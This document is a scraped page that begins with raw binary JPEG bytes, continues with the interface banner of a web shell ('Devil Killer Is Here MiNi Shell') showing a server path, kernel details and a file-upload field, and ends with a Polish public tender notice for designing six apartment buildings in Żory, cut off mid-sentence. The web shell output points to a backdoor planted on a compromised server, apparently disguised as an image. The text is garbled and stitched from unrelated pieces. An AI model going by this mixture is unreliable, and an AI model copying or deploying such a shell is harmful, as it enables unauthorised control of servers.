JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220720/0026704701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zaprojektowanie, uzyskanie niezbędnych decyzji administracyjnych oraz pełnienie nadzoru autorskiego budowy zespołu sześciu budynków mieszkalnych wielorodzinnych na os. Sikorskiego w Żorach. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Budynków Miejskich w Żorach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272552119</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Wojska Polskiego 4 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żory</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">324356344</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@zbmzory.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zbmzory.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zaprojektowanie, uzyskanie niezbędnych decyzji administracyjnych oraz pełnienie nadzoru autorskiego budowy zespołu sześciu budynków mieszkalnych wielorodzinnych na os. Sikorskiego w Żorach. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d04601fd-065c-11ed-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00267047</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00025019/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Zaprojektowanie, uzyskanie niezbędnych decyzji administracyjnych oraz pełnienie nadzoru autorskiego budowy zespołu sześciu budynków mieszkalnych wielorodzinnych na os. Sikorskiego w Żorach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zory.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zory.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzieleniu zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy do elektronicznej obsługi zamówień. Ofertę, oświadczenie, o których mowa w<br/>art. 125 ust. 1 ustawy Pzp należy złożyć pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Szczegóły dotyczące komunikacji zostały opisane SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dot. przetwarzania danych osobowych<br/>&#34;Ewidencja zamówień publicznych&#34;<br/>Zgodnie z przepisami o ochronie danych osobowych oraz Rozporzadzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27.04.2016 r. informujemy, że :<br/>1)	administratorem Pani/Pana danych osobowych jest Zarząd Budynków Miejskich z siedzibą w Żorach Al. Wojska Polskiego 4a tel. 324356464<br/>2)	inspektorem ochrony danych osobowych w ZBM jest Pani Anna Szelka, kontakt tel.32 4356464, email : ido@zbmzory.pl<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 pkt 1 c ( obowiązek prawny) RODO w celu :<br/>a)	realizacji postępowań o zamówienie publiczne<br/>b)	wywiązania się z przepisów Prawo zamówień publicznych<br/>4)	Pani/Pana dane osobowe mogą być udostępniane<br/>a) uczestnikom postępowania zgodnie z przepisami ustwy Prawo zamówień publicznych<br/>b)	innym podmiotom na podstawie przepisów prawa, <br/>5)	Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego<br/>6)	Pani/Pana dane osobowe będą przechowywane przez okres 10 lat.<br/>7)	posiada Pani/Pan prawo dostępu do treści swoich danych oraz prawo żądania ich sprostowania, usunięcia, ograniczenia przetwarzania, prawo do przenoszenia danych, prawo wniesienia sprzeciwu, <br/>8)	ma Pani/Pan prawo wniesienia skargi do UODO gdy uzna Pani/Pan, iż przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy ogólnego rozporządzenia o ochronie danych osobowych <br/>9)	podanie przez Panią/Pana danych osobowych jest warunkiem uczestnictwa w postepowaniu o udzielenie zamówienia publicznego<br/>10)	Pani/Pana dane nie będą przetwarzane w sposób zautomatyzowany / profilowane</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DT.BM.321.1.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Opracowanie kompletnej pełnobranżowej dokumentacji projektowej związanej z budową zespołu sześciu budynków mieszkalnych wielorodzinnych wraz z infrastrukturą techniczną na os. Sikorskiego w Żorach – działki nr 1882/115, 4226/62, 2710/62 wraz z uzyskaniem niezbędnych decyzji administracyjnych. <br/>2. Dokumentacja projektowa powinna zawierać:<br/>1) Projekt architektoniczno-budowlany:<br/>• rzuty: fundamentów, poszczególnych kondygnacji oraz dachów,<br/>• przekroje podłużne i poprzeczne poszczególnych brył budynków projektowanych,<br/>• rysunki poszczególnych elewacji,<br/>• wizualizację obejmującą zewnętrzne bryły zespołu budynków wraz z zagospodarowaniem terenu.<br/>• wszystkie inne elementy konieczne do uzyskania decyzji o pozwoleniu na budowę<br/>2) Projekt zagospodarowania terenu:<br/>- opracowanie projektu zagospodarowania terenu na aktualnych mapach do celów projektowych,<br/>- projekt zagospodarowania terenu uwzględniający założenia dołączonej przez Zamawiającego koncepcji w tym obiekty kubaturowe, drogi wewnętrzne, chodniki, palce zabaw i zieleń,<br/>- projekt dwóch zjazdów z drogi publicznej,<br/>- projekt odwodnienia terenów utwardzonych, dróg oraz dachów nowych obiektów kubaturowych,<br/>- projekty zabezpieczenia lub przebudowy istniejącego uzbrojenia terenu w przypadku wystąpienia kolizji z planowaną inwestycją,<br/>- projekty przyłączy i instalacji do nowych obiektów kubaturowych,<br/>- projekt oświetlenia zewnętrznego zagospodarowania terenu (oświetlenie chodników, dróg i parkingów),<br/>- projekt nasadzeń uwzględniający lokalizację obszarów zieleni, terenów rekreacyjnych z elementami małej architektury,<br/>- analizę przesłaniania.<br/>3) Projekty techniczne poszczególnych branż:<br/>a/ branża budowlana <br/>• projekt konstrukcyjny z obliczeniami oraz z zestawieniami stali zbrojeniowej i ( jeżeli występuje) stali konstrukcyjnej lub drewna konstrukcyjnego,<br/>• projekt kolorystyki pomieszczeń tj. ścian, sufitów i posadzek, z określeniem rodzaju materiałów i ich parametrów technicznych oraz podaniem technologii wykonania,<br/>• projekt elewacji (w zakresie uszczegółowienia projektu architektonicznobudowlanego) z określeniem rodzaju materiałów i ich parametrów technicznych oraz podaniem technologii wykonania,<br/><br/>b/branża drogowa<br/>• projekt dróg wewnętrznych i parkingów z charakterystycznymi przekrojami i określeniem rodzaju materiałów i ich parametrów technicznych, wraz z ich odwodnieniem.<br/>c/zakres projektu instalacji elektrycznych:<br/>• zasilanie i rozdział energii elektrycznej – nowe przyłącza dla projektowanych budynków,<br/>• wyłącznik pożarowy prądu,<br/>• oświetlenie podstawowe,<br/>• awaryjne oświetlenie ewakuacyjne,<br/>• gniazda wtyczkowe,<br/>• zasilanie 3 fazowe,<br/>• ochrona przeciwprzepięciowa,<br/>• ochrona przeciwporażeniowa,<br/>• instalacja odgromowa,<br/>•oświetlenie zewnętrzne chodników, dróg i parkingów,<br/>• automatyka, sterowanie i zasilanie urządzeń i systemów instalacji sanitarnych - należy dołączyć do części instalacyjnej,<br/>• zabezpieczenie lub przebudowa sieci elektrycznych i teletechnicznych w zakresie kolizji z elementami projektowanymi,<br/><br/>d/zakres projektu instalacji niskoprądowych:<br/>• instalacja teleinformatyczna (sieć strukturalna z szafą dystrybucyjną i wyposażeniem),<br/>• instalacja monitoringu wizyjnego w częściach wspólnych,<br/>• instalacja monitoringu wizyjnego zewnętrznego,<br/>• instalacja do odbioru telewizji naziemnej i satelitarnej,<br/>• instalacja oddymiania i system sygnalizacji pożaru jeśli będą wymagane,<br/>• instalacja domofonowa,<br/>• kanalizacja teletechniczna łącząca budynki z istniejącą siecią lub do granicy działki.<br/><br/>c/zakres projektu instalacji sanitarnych:<br/>• przyłącza/instalacje/sieci zewnętrzne: kanalizacji sanitarnej, deszczowej, zimnej wody, C.O,<br/>• instalacja zimnej wody,<br/>• instalacja ciepłej wody, <br/>• instalacja hydrantowa (wewnętrzna lub zewnętrzna) - jeśli będzie wymagana,<br/>• instalacja kanalizacji sanitarnej,<br/>• instalacja kanalizacji deszczowej,<br/>• źródło ciepła: węzeł ciepłowniczy,<br/>• przebudowa kolidującej infrastruktury podziemnej,<br/>• instalacja wentylacji (wentylacja grawitacyjna lub grawitacyjna wspomagana mechanicznie), <br/>• instalacja centralnego ogrzewania.<br/> <br/>4) Wymagane przepisami oceny, opinie, ekspertyzy, uzgodnienia, warunki, pozwolenia i decyzje (w tym m.in. pozwolenie na wycinkę drzew w przypadku wystąpienia kolizji planowanej inwestycji, decyzje środowiskowe, uzgodnienia PZT, uzgodnienia zjazdów, uzgodnienia ZUD, warunki przyłączenia do sieci itp.)<br/>5) Opracować instrukcje bezpieczeństwa pożarowego oraz scenariusz pożarowy.<br/>6) Projektowana charakterystyka energetyczna budynku wraz z analizą źródła ciepła.<br/>7) Informacja BIOZ.<br/>8) Przedmiary robót i kosztorysy inwestorskie z podziałem na poszczególne branże: (branża budowlana, instalacyjna, elektryczna, zagospodarowanie terenu). W przedmiarach i kosztorysach należy uwzględnić wszystkie prace nawet te nie będące głównym tematem projektu a niezbędne do realizacji zadania.<br/>9) specyfikacje techniczne wykonania i odbioru robót (z podziałem na poszczególne branże),<br/>10) projekt przekładek kolidujących sieci, przyłączy i instalacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71321000-4 - Usługi inżynierii projektowej dla mechanicznych i elektrycznych instalacji budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">224 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następujących kryteriów:<br/><br/>Koszt wykonania - cena - 100 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)Wykonawca w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał co najmniej dwie usługi polegające na opracowaniu dokumentacji projektowej na podstawie których uzyskane zostały decyzje o pozwoleniu na budowę, których przedmiotem była budowa budynku mieszkalnego wielorodzinnego o powierzchni użytkowej nie mniejszej niż 1200 m2 oraz załączy dowody określające czy te usługi zostały wykonane należycie.<br/><br/>Uwaga:<br/>Dla oceny spełnienia warunku udziału w postępowaniu znaczenie ma data wykonania i odebrania dokumentacji projektowej, a nie uzyskania decyzji pozwalającej na wykonanie roboty budowlanej, której przedmiotem była budowa budynku mieszkalnego wielorodzinnego.<br/><br/>2) Wykonawca skieruje osoby, do realizacji zamówienia w szczególności odpowiedzialne za:<br/>a) 1 osobę odpowiedzialną za projektowanie w specjalności architektonicznej (uprawnienia w zakresie projektowania bez ograniczeń),<br/>b) 1 osobę odpowiedzialną za projektowanie w specjalności konstrukcyjnej (uprawnienia w zakresie projektowania bez ograniczeń),<br/>c) 1 osobę odpowiedzialną za projektowanie w specjalności sanitarnej (uprawnienia w zakresie projektowania bez ograniczeń),<br/>d) 1 osobę odpowiedzialną za projektowanie w specjalności elektrycznej (uprawnienia w zakresie projektowania bez ograniczeń),<br/>wraz z informacjami na temat jej kwalifikacji zawodowych i uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/><br/>UWAGA:<br/>Zamawiający dopuszcza łączenie funkcji projektantów pod warunkiem posiadania przez tę osobę odpowiednich uprawnień.<br/><br/>Przez uprawnienia „bez ograniczeń” wydane pod rządami aktualnie obowiązujących przepisów rozumie się uprawnienia w zakresie określonym przez te przepisy, natomiast uprawnienia wydane uprzednio mogą zawierać ograniczenia występujące ówcześnie w porządku prawno-administracyjnym pod warunkiem, że nie są to ograniczenia odpowiadające dokładnie ograniczeniom obecnym (kubaturowym), lub ograniczenia te nie są ograniczeniami uniemożliwiającymi posiadającej je osobie sprawowanie funkcji technicznych w budownictwie w zakresie umożliwiającym wykonanie prac objętych przedmiotem zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykazu dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; <br/>Uwaga: Jeżeli wykonawca powołuje się na doświadczenie w realizacji dostaw wykonywanych wspólnie z innymi wykonawcami, wykaz dotyczy dostaw, w których wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>2) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wypełniony formularz ofertowy (zwany dalej ofertą) musi zawierać następujące załączniki:<br/>a. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy pzp o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym przez zamawiającego (zgodnie z zał. nr 1 do oferty) <br/>b. Oświadczenie w związku z art. 117 ust. 4 ustawy pzp, z którego wynika, które usługi wykonają poszczególni wykonawcy w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - jeżeli dotyczy (zgodnie z zał. nr 2 do oferty), <br/>c. zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia lub inny dokument potwierdzający ten fakt - jeżeli dotyczy, <br/>d. pełnomocnictwo - jeśli dotyczy, <br/>e. wadium jeżeli wykonawca wnosi wadium w innej formie niż pieniężna, <br/>2) Informacje stanowiące tajemnicę przedsiębiorstwa złożone w formie elektronicznej lub postaci elektronicznej podpisane podpisem zaufanym lub podpisem osobistym, powinny zostać złożone w osobnym pliku. Nazwa pliku powinna jednoznacznie wskazywać, iż dane w nim zawarte stanowią tajemnicę przedsiębiorstwa. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 4.000,00 zł (słownie: cztery tysiące złotych 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Przedłużający się powyżej 30 dni czas uzyskania opinii, uzgodnień i decyzji wymaganych przepisami prawa. Zmiana terminów wykonania przedmiotu umowy o tyle dni o ile wydłużył się powyżej 30 dni czas uzyskania opinii, uzgodnień i decyzji wymaganych przepisami prawa, na pisemny wniosek Wykonawcy.<br/>2.	Wystąpienie siły wyższej uniemożliwiającej zrealizowanie zamówienia w terminie umownym. Zmiana terminu realizacji zamówienia o tyle dni ile trwało usuwanie skutków siły wyższej i/lub ustąpienie siły wyższej.<br/>3.	Konieczność wykonania dodatkowych prac projektowych niezbędnych do prawidłowego wykonania zamówienia podstawowego których wykonanie stało się konieczne na skutek sytuacji niemożliwych do przewidzenia, a które maja wpływ na termin realizacji zamówienia. Zmiana terminu realizacji zamówienia o tyle dni ile trwało wykonanie dodatkowych prac projektowych.<br/>4.	Potrzeba wykonania robót realizowanych na podstawie art. 455 ust. 1 pkt 3-4 i ust. 2 ustawy 